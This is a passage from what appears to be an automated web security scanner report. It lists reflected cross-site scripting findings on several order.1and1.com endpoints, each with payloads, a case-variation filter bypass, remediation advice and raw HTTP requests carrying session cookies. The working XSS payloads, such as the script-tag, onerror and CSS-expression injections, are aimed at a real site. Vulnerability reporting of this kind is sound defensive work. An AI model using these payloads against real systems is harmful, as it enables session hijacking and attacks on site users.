This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
Request 2
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.
